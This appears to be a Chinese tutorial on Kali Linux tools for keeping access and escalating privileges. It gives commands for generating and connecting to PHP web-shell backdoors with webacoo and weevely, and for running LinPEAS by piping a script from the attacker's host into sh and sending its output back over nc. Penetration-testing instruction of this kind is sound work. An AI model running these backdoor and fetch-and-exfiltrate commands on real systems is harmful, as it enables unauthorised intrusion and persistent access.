全网首发！Kali Linux 2025工具指南-权限提升持久篇

在网络安全中，我们需要维持自己的得到的Shell会话。而这需要权限维持，接下来我们将为你介绍在Kali中常见的几款权限维持工具。

持久性篇

在此栏目下，列出了常见的几款维持工具，也比较好用。接下来，为大家简单介绍。

01

laudanum

laudanum是Kali中的一款Web Shell工具。支持ASP、ASP.net、JSP、PHP、Coldfusion。可以实现DNS、文件系统、代理和Shell的访问。同时，它还针对WordPress搭建的网站，提供封装好的插件。通过WordPress插件功能，实现Shell。目录地址：/usr/share/laudanum/

02

webacoo

webacoo编码通信内容通过cookie头传输，隐蔽性强。

生成服务端

webacoo -g -o a.php

客户端连接

webacoo -t -u http://x.x.x.x/a.php<

03

web shells

和前面的laudanum功能类似。支持多种语言如aspphpperl等。默认目录/usr/share/webshells

04

weevely

Weevely是一个基于 Python 编写的工具，主要用于生成和管理 PHP程序。它采用 C/S 模式构建。

生成客户端：

weevely generate 1234 /123.php

其中1234便是密码。

连接：

eevely terminal [-h] url password [cmd]

权限提升

01

LinPEAS

LinPEAS 是一款用于 Linux 权限提升的自动化脚本，能够快速枚举系统信息，帮助发现潜在的提权路径。以下是其使用方法及相关技巧。

使用：

# 在kali上启动 HTTP 服务器
python3 -m http.server 80

# 在目标机器上下载并执行脚本
curl -s http://<kaliIP>/linpeas.sh | sh

接下来，我们配合NC工具获取权限。

# kali监听端口
nc -lnvp 81 > linpeas.out

# 目标机器执行脚本并将结果回传
curl -s http://<kaliIP>/linpeas.sh | sh | nc <kali ip> 81

02

WinPEAS

WinPEAS 是一款用于 Windows 系统的本地权限提升辅助工具，能够快速枚举系统中的潜在漏洞和错误配置。

使用：在目标系统中运行以下命令：

winPEASany.exe

默认情况下，WinPEAS 会执行所有检查并输出结果。

03

unix-privesc-check

Unix-Privesc-Check是一款用于检测 Unix 系统中潜在提权漏洞的工具。可以快速检测系统中的错误配置，从而发现可以用于提权的漏洞。该工具适用于安全审计、渗透测试和系统维护等场景。

使用：执行命令

unix-privesc-check standard

在输出中搜索单词“WARNING”。如果没有看到“WARNING”，则表示脚本没有发现任何问题。